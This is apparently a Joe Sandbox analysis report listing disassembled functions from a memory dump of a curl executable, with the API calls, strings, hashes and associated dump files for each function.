Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$memcpystrchr
String ID: ../$/..$/../$/./$?
API String ID: 2999326979-134497593
Opcode ID: 48ee56c3b9f23d6359f6562f344d2ad5e9de1b564b2d050d3d93d2656ca4c6f2
Instruction ID: f47378cc16c2bbe857ed4afaa1a187b1c51b495ba33d6b44401c943ff0e682b9
Opcode Fuzzy Hash: 48ee56c3b9f23d6359f6562f344d2ad5e9de1b564b2d050d3d93d2656ca4c6f2
Instruction Fuzzy Hash: 2551D5719083504FEB219F249498737BFE1AB4A344F0944BBEE858B353E63E8D4D875A

Function 00444E19 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 305stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00445094
strchr.MSVCRT ref: 00445142

Strings

0123456789-, xrefs: 0044513B
APM0123456789:, xrefs: 0044508D
<DIR>, xrefs: 004450CF

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchr
String ID: 0123456789-$<DIR>$APM0123456789:
API String ID: 2830005266-4291660576
Opcode ID: 2802eae00076790489d0e3e1fc18434fc449eb61d61f678c26b5d42df7098f8b
Instruction ID: 43128450a46cc418b30cbca465cb7f195904cf7d2a9769f97376a06baa303383
Opcode Fuzzy Hash: 2802eae00076790489d0e3e1fc18434fc449eb61d61f678c26b5d42df7098f8b
Instruction Fuzzy Hash: 98D14570608705CFEB14CF18D18475BBBE1BF94318F14885AF8448B356E779E989CB9A

Function 00422A10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 235stringCOMMON

Download Yara Rule

APIs

time.MSVCRT ref: 00422A22

Part of subcall function 00421970: time.MSVCRT ref: 00421986

strlen.MSVCRT ref: 00422ADD
strchr.MSVCRT ref: 00422B0B
strlen.MSVCRT ref: 00422B3B
strncmp.MSVCRT ref: 00422B53

Strings

?, xrefs: 00422B00

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlentime$strchrstrncmp
String ID: ?
API String ID: 524316268-1684325040
Opcode ID: c2724d471df589467342d4e278656d75e4df6be5726181edcd512f58a89f9f8a
Instruction ID: 6edda9324ef0db8a471563318e369fb22abc96c459434245752f39c6c6696e06
Opcode Fuzzy Hash: c2724d471df589467342d4e278656d75e4df6be5726181edcd512f58a89f9f8a
Instruction Fuzzy Hash: A7915B706047209FCB10DF15D58061BBBE0BF88754F55896EDC888B326E378ED41CB9A

Function 00401F90 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 191COMMON

Download Yara Rule

APIs

Part of subcall function 0040E980: GetTickCount.KERNEL32 ref: 0040E984

memset.MSVCRT ref: 004020D2
curl_msnprintf.CURL ref: 004020F7

Part of subcall function 0040F070: curl_mvsnprintf.CURL ref: 0040F092

curl_mfprintf.CURL ref: 00402118
fflush.MSVCRT ref: 00402123
curl_mfprintf.CURL ref: 004021EE

Strings

%%-%ds %%5.1f%%%%, xrefs: 004020E4
(, xrefs: 004020EC

Memory Dump Source

Source File: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mfprintf$CountTickcurl_msnprintfcurl_mvsnprintffflushmemset
String ID: %%-%ds %%5.1f%%%%$(
API String ID: 674138103-2243520151
Opcode ID: 150afee12588d2c597e759a3c87b43c8aa000e05e84e19a1feadc36a03192263
Instruction ID: cb4f934986b887bfdfd7165e2a00ad5183fdea87d3590da672270bf5cf8e3abc
Opcode Fuzzy Hash: 150afee12588d2c597e759a3c87b43c8aa000e05e84e19a1feadc36a03192263
Instruction Fuzzy Hash: 52813575A083449BC714DF1AC58468FBBE1FFC8348F05892EF988A7391D778E9418B86

Function 00433A10 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 139COMMON

Download Yara Rule

APIs

time.MSVCRT ref: 00433A2A
time.MSVCRT ref: 00433AEE

Strings

set timeouts for state %d; Total %ld, retry %d maxtry %d, xrefs: 00433AD2
Connection time-out, xrefs: 00433B90
gfff, xrefs: 00433B1C
2, xrefs: 00433B69
gfff, xrefs: 00433A79

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: time
String ID: 2$Connection time-out$gfff$gfff$set timeouts for state %d; Total %ld, retry %d maxtry %d
API String ID: 1872009285-13630374
Opcode ID: 244eee71c3fe7db40292746d80eebe9ec270f0bdf6e4138b7368885b0160afab
Instruction ID: 0f081145eb00c97f499031b1fa05e3384c0b9bb0736ee98a990cbd4938193678
Opcode Fuzzy Hash: 244eee71c3fe7db40292746d80eebe9ec270f0bdf6e4138b7368885b0160afab
Instruction Fuzzy Hash: 8441C2B1A043118BC7089F2AD5942667BE0AF4C305F1556AFED4ACF386D778ED448F85

Function 0040F4AC Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 130COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 0040F179
curl_msnprintf.CURL ref: 0040F5A6
curl_msnprintf.CURL ref: 0040F5D0
sprintf.MSVCRT ref: 0040F62D

Strings

-, xrefs: 0040F550
%, xrefs: 0040F4B6
.%ld, xrefs: 0040F5C4
%ld, xrefs: 0040F596

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_msnprintf$fputcsprintf
String ID: %$%ld$-$.%ld
API String ID: 3435541931-3288194552
Opcode ID: ea940504520d79f8d7088783caf67d66002f59ae8321cb61e4d8ac247f1fd83b
Instruction ID: 843c87e3ad1bb78902c36b58a0e7b9e44177227dc79be7ac50b466d94754aa6b
Opcode Fuzzy Hash: ea940504520d79f8d7088783caf67d66002f59ae8321cb61e4d8ac247f1fd83b
Instruction Fuzzy Hash: C3515E725087419FD310CF18C48475AFBE0AF94358F19897EE8C8A73A2D779E989CB46

Function 00411BC0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 00411BE0
strlen.MSVCRT ref: 00411BF0
strchr.MSVCRT ref: 00411C9B
strrchr.MSVCRT ref: 00411CF5
strrchr.MSVCRT ref: 00411D07

Strings

; filename="%s", xrefs: 00411C4F, 00411CB0
\, xrefs: 00411CFA

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strchrstrrchr$strlen
String ID: ; filename="%s"$\
API String ID: 3478943977-1719146394
Opcode ID: a8f37e7793fa6c757ad9830f9b99e72a0822fb39daf80cde7911e7797816e77a
Instruction ID: 6fb454dbe7480e231665b66fcb8de2269deab1ee777ed7e1788d36fdceeda843
Opcode Fuzzy Hash: a8f37e7793fa6c757ad9830f9b99e72a0822fb39daf80cde7911e7797816e77a
Instruction Fuzzy Hash: C141A3706087148FD710AF65D4843ABBBE5AF45785F05882EDA858B312E779D8848B8A

Function 00404DB9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00404DD6
_strdup.MSVCRT ref: 00404DEF
curl_strequal.CURL ref: 00406100
fclose.MSVCRT ref: 0040613E

Strings

<stdin>, xrefs: 00406113
Failed to read %s, xrefs: 0040615D

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _strdupcurl_strequalfclosefree
String ID: <stdin>$Failed to read %s
API String ID: 1574784572-3349806160
Opcode ID: 72cf3ec325ac9d88b397e0e36f9683d9a0610ae3fb17602ec9e3d8bd851eeeb7
Instruction ID: a3b2e462ffffc6326feee1b1d40580005fb13ca1bc1e28724819f5b40f2b23aa
Opcode Fuzzy Hash: 72cf3ec325ac9d88b397e0e36f9683d9a0610ae3fb17602ec9e3d8bd851eeeb7
Instruction Fuzzy Hash: 1831FCB46083849BC7209F25C58479EBBE0AFD5358F05492EEDC9AF391E778D940CB1A

Function 004075E9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00407541
isspace.MSVCRT ref: 00407566
fwrite.MSVCRT ref: 00407590
fputc.MSVCRT ref: 004075A6
fputs.MSVCRT ref: 004075C5

Strings

F, xrefs: 004075F0
Warning: , xrefs: 00407536
F, xrefs: 00407546

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fwrite$fputcfputsisspace
String ID: F$F$Warning:
API String ID: 2168562629-782175711
Opcode ID: 239b9bd4333e1854b62f814a9382caadc85490cf578a95802a81bc4c6526e37b
Instruction ID: f8cd7bee92ce8f57582a056605c56d0bbe9b247ba557fb5947878f47b495ea61
Opcode Fuzzy Hash: 239b9bd4333e1854b62f814a9382caadc85490cf578a95802a81bc4c6526e37b
Instruction Fuzzy Hash: 4511BAB4908345AFC710EF65D8447AEBBE0AB45304F00881FE89857382E77DA5499F97

Function 0044D260 Relevance: 12.2, APIs: 8, Instructions: 221COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0044D289
isspace.MSVCRT ref: 0044D2AC
isupper.MSVCRT ref: 0044D3D7

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: _errnoisspaceisupper
String ID:
API String ID: 4032161992-0
Opcode ID: da98f6c563efb7b1745b415f5a24d87ecffd29efeca7a1789d9e9ecd0cc975b2
Instruction ID: 5582f324c5ab99b39034ea9e2b3c6b08676f42014037c339599df42267ac077f
Opcode Fuzzy Hash: da98f6c563efb7b1745b415f5a24d87ecffd29efeca7a1789d9e9ecd0cc975b2
Instruction Fuzzy Hash: 59710371E083158BE710DE69848022FFBE1BBD1355F184A2FEC9087356D67CD94A8B8B

Function 00411D60 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 302stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00411FAB

Strings

application/octet-stream, xrefs: 0041258C
4, xrefs: 00411F6E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen
String ID: 4$application/octet-stream
API String ID: 39653677-2539931216
Opcode ID: db78bc33e3a67481c9f6a6e52f83ca5cd2f5b0a4f1738458711a82ca8388a9ad
Instruction ID: 35b3fd0fe7f91e6cedae2a78ddd867ca4159dd0fa3f69d23815c04f83e08de5c
Opcode Fuzzy Hash: db78bc33e3a67481c9f6a6e52f83ca5cd2f5b0a4f1738458711a82ca8388a9ad
Instruction Fuzzy Hash: 3CC1E3746053059BDB10CF29C68079BBBE1BB88344F15492EED98DB350D3B8ED91CB9A

Function 0042F979 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 196stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416640: curl_mvsnprintf.CURL ref: 00416682
Part of subcall function 00416640: strlen.MSVCRT ref: 0041668A

strrchr.MSVCRT ref: 0042F615
curl_maprintf.CURL ref: 0042F7A7

Strings

/, xrefs: 0042F606
%s%s, xrefs: 0042F79C
Wildcard - START of "%s", xrefs: 0042F7F0
Wildcard - "%s" skipped by user, xrefs: 0042F983

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintfcurl_mvsnprintfstrlenstrrchr
String ID: %s%s$/$Wildcard - "%s" skipped by user$Wildcard - START of "%s"
API String ID: 4256893071-3476045174
Opcode ID: f94eba1fa0df2f6ae440c9957a2865a3a9517f7be3a05ecfd94ecbc3b936b61f
Instruction ID: 05f7386a32b9d1c65466a6a67d6f15b46746d96673522213b021ca4b5837804d
Opcode Fuzzy Hash: f94eba1fa0df2f6ae440c9957a2865a3a9517f7be3a05ecfd94ecbc3b936b61f
Instruction Fuzzy Hash: 6F9102B4308A119FD704DF28D48475AB7E0FB84304F55C67AE5988B355DB39E885CB8A

Function 0041256C Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00411FAB
strlen.MSVCRT ref: 004125B5
strlen.MSVCRT ref: 004125C6
curl_strequal.CURL ref: 004125DA

Strings

application/octet-stream, xrefs: 0041258C
4, xrefs: 00411F6E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$curl_strequal
String ID: 4$application/octet-stream
API String ID: 3086087823-2539931216
Opcode ID: f859c634174adb064e238a12662515a4c9c473fafb9432afb69b8cbca61d2fe5
Instruction ID: edaa0b17353cc54ed6149ec7cc513c9e8ea31a3828294bd19aafeeed018fa6b1
Opcode Fuzzy Hash: f859c634174adb064e238a12662515a4c9c473fafb9432afb69b8cbca61d2fe5
Instruction Fuzzy Hash: 9161D5B4A053059FCB50CF29C28069ABBE1BF88744F15452EEC98D7311D378E991CF8A

Function 00416930 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 152stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00416951

Strings

Write callback asked for PAUSE when not supported!, xrefs: 00416A32
Failed writing header, xrefs: 004169D4
Failed writing body (%zu != %zu), xrefs: 00416B7F

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen
String ID: Failed writing body (%zu != %zu)$Failed writing header$Write callback asked for PAUSE when not supported!
API String ID: 39653677-2483876519
Opcode ID: f2bb8310aa4f0d2dfbcf4320b98f034a214c3023a5df9e32d3626e0a153285ba
Instruction ID: 3891c32a7b7771591eddcd1b1496656326a9d4467bce016e1abf62a9e8ea379a
Opcode Fuzzy Hash: f2bb8310aa4f0d2dfbcf4320b98f034a214c3023a5df9e32d3626e0a153285ba
Instruction Fuzzy Hash: 27515CB15187009BC7109F18C48439ABBE4FF84755F4A887FEC888B316D778D880CB9A

Function 0043CDE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 148stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0043CE0A
strlen.MSVCRT ref: 0043CE1E
curl_easy_unescape.CURL ref: 0043CE6C
strlen.MSVCRT ref: 0043CE7E

Strings

d, xrefs: 0043CEC3
Failed sending Gopher request, xrefs: 0043CF0B, 0043D006

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$curl_easy_unescape
String ID: Failed sending Gopher request$d
API String ID: 1647907364-1452159754
Opcode ID: ef29186d9342c8ba0c7a20d9ec5f9b1df7414ca707e4a5dc29957825cb231ece
Instruction ID: 796f2686a19d84498f4058bb9a9e07a49c0d9791766ed2d553732472d5eddd81
Opcode Fuzzy Hash: ef29186d9342c8ba0c7a20d9ec5f9b1df7414ca707e4a5dc29957825cb231ece
Instruction Fuzzy Hash: 14510AB05093019FD710AF2AC48521FBBE1BF88758F158A2EF4D897391E778D9458F86

Function 004227B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 114fileCOMMON

Download Yara Rule

APIs

curl_strequal.CURL(?,?,?,?,?,?,?,?,?,004229CD), ref: 004227E9

Part of subcall function 0040EF20: _stricmp.MSVCRT ref: 0040EF32

fgets.MSVCRT ref: 00422835
fopen.MSVCRT ref: 004228DC

Strings

Set-Cookie:, xrefs: 0042284E
none, xrefs: 00422952

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
